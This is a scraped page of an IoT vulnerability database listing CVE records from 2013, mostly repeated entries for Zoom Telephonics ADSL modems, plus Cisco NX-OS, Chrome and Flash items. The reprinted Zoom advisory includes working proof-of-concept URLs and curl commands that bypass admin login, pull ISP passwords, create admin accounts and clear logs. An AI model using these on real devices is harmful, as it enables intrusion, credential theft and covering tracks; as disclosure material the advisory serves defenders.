VARIoT IoT vulnerabilities database


VAR-201307-0229 CVE-2013-3400 Arbitrary command execution vulnerability in Cisco NX-OS running on Cisco Nexus 1000V devices CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
The license-installation module in Cisco NX-OS on Nexus 1000V devices allows local users to execute arbitrary commands via crafted "install license" arguments, aka Bug ID CSCuh30824. The Cisco Nexus Series switches are data center switches that run the Cisco Nexus OS operating system. Successful exploits may compromise the affected computer. This issue is being tracked by Cisco Bug ID CSCuh30824.
VAR-201309-0455 CVE-2013-5620 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions.

Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.

----------------------------------------------------------------
Directory Traversal/Unauthenticated access to administrative panels

CVSS Base Score 9.7
Impact Subscore 9.5
Temporal Score: 8.3
(AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-22: Improper Limitation of a Pathname to a Restricted Directory

CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2
CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X

By simply placing the following two URLs into a web browser, a vulnerability in all models and firmware versions allows for bypass of the administrative credential challenge. All models and firmware versions can access these pages with no authentication. An unauthenticated user can perform almost all administrative tasks once the authentication is bypassed.

http://<IP>/hag/pages/toc.htm (--Menu Banner)
http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu)

----------------------------------------------------------------
Improper handling of unexpected characters/data

CVSS Base Score 8.3
Impact Subscore 8.5
Temporal Score: 6.7
(AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR)
CWE-241: Improper Handling of Unexpected Data Type

CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2
CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X
CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions
CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions

When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser is immediately redirected to the "System Status" page without authentication, where links to each interface (i.e. eth-0, usb-0, etc.) are selectable and their properties can be edited.

----------------------------------------------------------------
Plain text storage of ISP/PPPoE usernames/passwords

CVSS Base Score 6.8
Impact Subscore 6.4
Temporal Score: 8.6
(AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR)
CWE-311: Missing Encryption of Sensitive Data

CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2
CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X

The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.)

Proof of Concept

curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }'
value="wanpasswd1" ('or similar')

curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }'
value="user@usersisp.net" ('or similar')

----------------------------------------------------------------
Unauthenticated direct execution of administrative tasks

CVSS Base Score 10.0
Impact Subscore 10.0
Temporal Score: 8.6
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-285: Improper Authorization

CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X
CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X
CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X

Administrative authentication can be bypassed and commands directly executed with specially crafted commands.

Proofs of Concept

Create New Acct Admin or Intermediate (all PW and admin names are 'or similar')
http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

Clear Logs
http://<IP>/Action?id=76&cmdClear+Log=Clear+Log

----------------------------------------------------------------
Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time.

Workaround: It is advised to turn off all remote administrative access to the router. This workaround, however, will not prevent local attacks.

----------------------------------------------------------------
External Links
http://www.osvdb.org/show/osvdb/95071
http://xforce.iss.net/xforce/xfdb/85612
http://www.idappcom.com/db/?7819

Vendor Links
http://www.zoomtel.com/products/5715.html
http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf
http://www.zoomtel.com/products/adsl_overview.html
http://www.zoomtel.com/products/5760.html
http://www.zoomtel.com/products/5751.html
http://www.zoomtel.com/products/5754.html

Discovered - 06-28-2013
Updated - 09/01/2013
Research Contact - K Lovett
Affiliation - QuattroSG
VAR-201309-0468 CVE-2013-5633 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0466 CVE-2013-5631 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0467 CVE-2013-5632 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0464 CVE-2013-5629 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0462 CVE-2013-5627 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions.

Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.

----------------------------------------------------------------------------------------------------------------
Directory Traversal/Unauthenticated access to administrative panels

CVSS Base Score 9.7
Impact Subscore 9.5
Temporal Score: 8.3
(AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-22: Improper Limitation of a Pathname to a Restricted Directory

CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2
CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X

By simply placing the following two URLs into a web browser, a vulnerability in all models and firmware versions allows for bypass of the administrative credential challenge. All models and firmware versions can access these pages with no authentication. An unauthenticated user can perform almost all administrative tasks once the authentication is bypassed.

http://<IP>/hag/pages/toc.htm (--Menu Banner)
http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu)

----------------------------------------------------------------------------------------------------------------
Improper handling of unexpected characters/data

CVSS Base Score 8.3
Impact Subscore 8.5
Temporal Score: 6.7
(AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR)
CWE-241: Improper Handling of Unexpected Data Type

CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2
CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X
CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions
CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions

When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser is immediately redirected to the "System Status" page without authentication, where the link to each interface (i.e. eth-0, usb-0, etc.) is selectable and its properties can be edited.

----------------------------------------------------------------------------------------------------------------
Plain text storage of ISP/PPPoE usernames/passwords

CVSS Base Score 6.8
Impact Subscore 6.4
Temporal Score: 8.6
(AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR)
CWE-311: Missing Encryption of Sensitive Data

CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2
CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X

The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.)

Proof of Concept

curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }'
value="wanpasswd1" ('or similar')

curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }'
value="user@usersisp.net" ('or similar')

----------------------------------------------------------------------------------------------------------------
Unauthenticated direct execution of administrative tasks

CVSS Base Score 10.0
Impact Subscore 10.0
Temporal Score: 8.6
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-285: Improper Authorization

CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X
CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X
CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X

Administrative authentication can be bypassed and commands directly executed with specially crafted commands.

Proofs of Concept

Create New Acct Admin or Intermediate (all PW and admin names are 'or similar')
http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

Clear Logs
http://<IP>/Action?id=76&cmdClear+Log=Clear+Log

----------------------------------------------------------------------------------------------------------------
Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time.

Workaround: It is advised to turn off all remote administrative access to the router. This workaround, however, will not prevent local attacks.

----------------------------------------------------------------------------------------------------------------
External Links
http://www.osvdb.org/show/osvdb/95071
http://xforce.iss.net/xforce/xfdb/85612
http://www.idappcom.com/db/?7819

Vendor Links
http://www.zoomtel.com/products/5715.html
http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf
http://www.zoomtel.com/products/adsl_overview.html
http://www.zoomtel.com/products/5760.html
http://www.zoomtel.com/products/5751.html
http://www.zoomtel.com/products/5754.html

Discovered - 06-28-2013
Updated - 09/01/2013
Research Contact - K Lovett
Affiliation - QuattroSG
VAR-201309-0465 CVE-2013-5630 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0463 CVE-2013-5628 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0460 CVE-2013-5625 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0461 CVE-2013-5626 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0458 CVE-2013-5623 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0459 CVE-2013-5624 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0457 CVE-2013-5622 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201309-0456 CVE-2013-5621 Multiple vulnerabilities in multiple Zoom Telephonics devices CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013.
VAR-201307-0325 CVE-2013-2872 Google Chrome on Mac OS X: vulnerability that can break the cryptographic protection mechanisms of third-party components CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Google Chrome before 28.0.1500.71 on Mac OS X does not ensure a sufficient source of entropy for renderer processes, which might make it easier for remote attackers to defeat cryptographic protection mechanisms in third-party components via unspecified vectors. Google Chrome is prone to a security vulnerability. The impact of this issue is currently unknown. We will update this BID as more information emerges. Versions prior to Chrome 28.0.1500.71 are vulnerable. NOTE: This issue was previously covered in BID 61041 (Google Chrome Prior to 28.0.1500.71 Multiple Security Vulnerabilities) but has been given its own record for better documentation. Google Chrome is a web browser developed by Google. The vulnerability stems from the program not ensuring a sufficient source of entropy for the renderer process. A remote attacker can exploit this vulnerability to defeat the cryptographic protection mechanisms of third-party components.
VAR-201307-0215 CVE-2013-3347 Adobe Flash Player Integer overflow vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Integer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via PCM data that is not properly handled during resampling.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the PCM processing code. By providing a malformed audio sample through ActionScript3, an attacker can cause an integer overflow.

Adobe Flash Player is prone to an integer-overflow vulnerability. Note: This issue was previously covered in BID 61038 (Adobe Flash Player APSB13-17 Multiple Remote Code Execution Vulnerabilities), but has been moved to its own record for better documentation. Failed attempts will likely cause a denial-of-service condition.

The product enables viewing of applications, content and video across screens and browsers. The vulnerability stems from the fact that the program does not correctly process the PCM data when resampling the PCM buffer provided by the user. It is also possible to take control of the affected system.

Background
==========

The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details.

Impact
======

A remote attacker could entice a user to open specially crafted SWF content, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass access restrictions.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All Adobe Flash Player users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310"

References
==========

[ 1 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248
[ 2 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248
[ 3 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249
[ 4 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249
[ 5 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250
[ 6 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250
[ 7 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251
[ 8 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251
[ 9 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252
[ 10 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252
[ 11 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253
[ 12 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253
[ 13 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254
[ 14 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254
[ 15 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255
[ 16 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255
[ 17 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256
[ 18 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256
[ 19 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257
[ 20 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257
[ 21 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258
[ 22 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258
[ 23 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259
[ 24 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259
[ 25 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260
[ 26 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260
[ 27 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261
[ 28 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261
[ 29 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262
[ 30 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262
[ 31 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263
[ 32 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263
[ 33 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264
[ 34 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264
[ 35 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265
[ 36 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265
[ 37 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266
[ 38 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266
[ 39 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267
[ 40 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267
[ 41 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268
[ 42 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268
[ 43 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269
[ 44 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269
[ 45 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270
[ 46 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270
[ 47 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271
[ 48 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271
[ 49 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272
[ 50 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272
[ 51 ] CVE-2012-5274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274
[ 52 ] CVE-2012-5275 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275
[ 53 ] CVE-2012-5276 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276
[ 54 ] CVE-2012-5277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277
[ 55 ] CVE-2012-5278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278
[ 56 ] CVE-2012-5279 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279
[ 57 ] CVE-2012-5280 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280
[ 58 ] CVE-2012-5676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676
[ 59 ] CVE-2012-5677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677
